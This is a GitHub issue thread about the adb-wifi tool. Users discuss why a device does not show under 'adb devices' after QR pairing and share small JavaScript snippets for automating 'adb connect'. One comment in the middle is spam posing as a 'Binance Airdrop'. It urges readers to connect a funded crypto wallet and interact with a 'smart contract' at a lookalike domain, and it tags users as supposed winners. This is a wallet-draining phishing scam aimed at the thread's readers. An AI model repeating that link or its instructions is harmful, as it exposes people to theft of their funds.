### ISSUE TITLE
adb devices is not working straight after pairing

### ISSUE THREAD

**Issue by SuperSandro2000** [saleehk/adb-wifi#1]
After pairing the adb devices daemon is started but the device is not appearing there. I still need to run ``adb connect 10.20.30.40:37890``. Could this be automated?

PS Thanks for this! wireless adb stops the pairing process so fast that it was a real hazzle to type in the port and code fast enough.

**Comment by frech87** [comment]
Hi, great job. And then how to connect to device without using ip:port? Connect via _adb-tls-connect hostname

**Comment by saleehk** [comment]
> 

@SuperSandro2000 does this adb pair not doing that?

**Comment by saleehk** [comment]
> 

Can you share more context ?

**Comment by SuperSandro2000** [comment]
> does this adb pair not doing that?

no, you need to run ``adb connect IP:PORT`` afterwards otherwise it does not appear under `´adb devices`` but the qr code is currently not working for me. The spinner on my device just spins indefinitely

**Comment by vnt-83** [comment]
Can I express my thoughts?

The function called connect (which calls exec adb pair) should be renamed to pair. And a new function called connect should be added (which calls exec adb connect).

And then in function startDiscover:
```
pair(item)
connect(item)
```

**Comment by fiurthorn** [comment]
But you have to use the connection port to connect, not the pairing port.

**Comment by zoutepopcorn** [comment]
Maybe we can do this:
```javascript
const portscanner = require('portscanner')
const {exec} = require("child_process");

portscanner.findAPortInUse(36000, 49999, '192.7.1.1', (error, port) => {
	console.log('AVAILABLE PORT AT: ' + port)
	exec(`adb connect 192.7.1.1:${port}`, (error, stdout, stderr) => {
		if(!error) {
			console.log("connected")
		} else {
			console.log("oopsie")
		}
	});
})
```
But it can be slow. Or entering first 2 digits of the port?

**Comment by fiurthorn** [comment]
why not use the port from the android device?
it is displayed right next to the qr code button.

```javascript
function main() {
  console.log(
    "[Developer options]->[Wireless debugging]->[Pair device with QR code]"
  );
  if (process.argv.length < 3) {
    console.log("Usage: adb-wifi <port>");
    return;
  }
  showQR();
  startDiscover();
}
```

**Comment by fahirazm** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @sayyidisal, @seymourde, @hdjvieira, @tkhieu, @marnuslabuchagne, @damienlenoir, @snappyJack

**Comment by bibek-magar** [comment]
> ```js
> ess debugging]->[Pai
> ```

did you solved it same for me... spinner is not stopping

**Comment by fiurthorn** [comment]
@bibek-magar https://github.com/fiurthorn/adb-wifi

**Comment by AngelKrak** [comment]
You can try checking if the same issue occurs with this project to fix it:
https://www.npmjs.com/package/adb-qc
